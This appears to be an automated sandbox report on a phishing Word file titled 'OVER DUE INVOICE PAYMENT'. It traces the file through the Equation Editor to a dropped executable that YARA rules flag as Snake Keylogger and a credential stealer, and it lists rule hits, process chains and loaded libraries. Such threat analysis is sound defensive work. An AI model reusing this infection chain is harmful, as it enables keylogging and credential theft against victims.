            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F3B8810_2_003F3B88
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F3FF010_2_003F3FF0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F3FED10_2_003F3FED
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F0BD010_2_003F0BD0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FBBD010_2_003FBBD0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F0BC410_2_003F0BC4
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FBBC110_2_003FBBC1
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_0059004010_2_00590040
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_00590CD810_2_00590CD8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_0059069010_2_00590690
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_0059000610_2_00590006
            Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: 9.2.obi23456.scr.31b7b70.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 9.2.obi23456.scr.780000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 9.2.obi23456.scr.780000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 9.2.obi23456.scr.21b9714.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000009.00000002.374594204.0000000000780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91894CAD.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, zi--.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, zi--.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, zi--.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, zi--.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.obi23456.scr.780000.2.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: 9.2.obi23456.scr.780000.2.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOCX@6/19@38/6
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ER DUE INVOICE PAYMENT.docxJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6F93.tmpJump to behavior
            Source: OVER DUE INVOICE PAYMENT.docxOLE indicator, Word Document stream: true
            Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.drOLE document summary: title field not present or empty
            Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.drOLE document summary: author field not present or empty
            Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.drOLE document summary: edited time not present or 0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: OVER DUE INVOICE PAYMENT.docxReversingLabs: Detection: 34%
            Source: OVER DUE INVOICE PAYMENT.docxVirustotal: Detection: 26%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: credssp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: gpapi.dllJump to behavior
            Source: OVER DUE INVOICE PAYMENT.LNK.0.drLNK file: ..\..\..\..\..\Desktop\OVER DUE INVOICE PAYMENT.docx
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: OVER DUE INVOICE PAYMENT.docxInitial sample: OLE zip file path = word/_rels/settings.xml.rels
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: obi23456.scr, 00000009.00000002.374423269.0000000000460000.00000004.08000000.00040000.00000000.sdmp, obi23456.scr, 00000009.00000002.374657544.0000000002161000.00000004.00000800.00020000.00000000.sdmp
            Source: OVER DUE INVOICE PAYMENT.docxInitial sample: OLE indicators vbamacros = False

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: obb[1].scr.8.dr, ----.cs.Net Code: CreateProvider
            Source: obi23456.scr.8.dr, ----.cs.Net Code: CreateProvider
            Source: obb[1].scr.8.drStatic PE information: 0x922C3AB8 [Tue Sep 17 22:29:12 2047 UTC]
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_00568F60 push eax; retf 8_2_00568F61
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_00570F60 push eax; retn 0056h8_2_00570F61
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_00574115 push ebp; ret 8_2_00574117
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0057410D push ebp; ret 8_2_0057410F
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_005758DF push ecx; ret 8_2_005758E3
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_005758D8 push ecx; ret 8_2_005758DB
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_005601F4 push eax; retf 8_2_005601F5
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_00575880 push ecx; ret 8_2_00575883
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0056418D push eax; iretd 8_2_0056468E
